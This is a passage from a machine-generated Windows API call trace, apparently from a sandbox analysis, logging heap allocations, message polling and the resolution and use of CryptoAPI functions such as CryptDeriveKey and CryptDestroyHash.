(HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d78 [0263.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0263.211] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0263.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0263.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0263.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0263.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0263.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0263.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0263.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0263.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0263.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0263.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0263.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0263.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0263.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0263.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0263.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0263.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0263.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0263.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0263.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0263.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0263.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0263.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0263.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0263.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0263.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0263.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0263.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0263.213] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0263.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0263.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0263.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0263.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0263.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0263.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0263.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0263.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0263.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0263.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0263.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0263.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0263.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0263.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0263.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0263.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0263.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0263.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0263.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0263.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0263.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0263.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0263.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0263.215] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0263.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0263.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0263.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0263.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0263.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0263.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0263.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0263.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0263.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0263.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0263.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0263.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0263.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51c88 [0263.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51c88, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0263.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0263.217] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0263.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0263.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0263.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0263.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0263.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0263.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0263.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0263.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0263.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0263.217] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa870d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa872d0) returned 1 [0263.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0263.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0263.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0263.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0263.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0263.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0263.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0263.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0263.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0263.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0263.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0263.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0263.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0263.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0263.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0263.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0263.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0263.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0263.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ef8 | out: hHeap=0x970000) returned 1 [0263.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0263.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52000 [0263.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0263.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52000 | out: hHeap=0x970000) returned 1 [0263.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0263.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52120 | out: hHeap=0x970000) returned 1 [0263.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f70 [0263.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0263.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ee0 [0263.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0263.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ee0 | out: hHeap=0x970000) returned 1 [0263.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0263.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0263.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0263.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0263.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0263.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0263.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0263.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0263.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0263.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0263.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.222] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0263.222] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.222] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.222] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0263.222] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.222] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0263.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0263.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0263.223] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0263.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0263.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0263.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0263.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0263.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e699a8 [0263.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0263.223] CryptDestroyHash (hHash=0xa870d0) returned 1 [0263.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0263.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0263.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0263.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0263.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0263.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0263.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0263.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0263.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0263.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0263.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0263.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0263.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 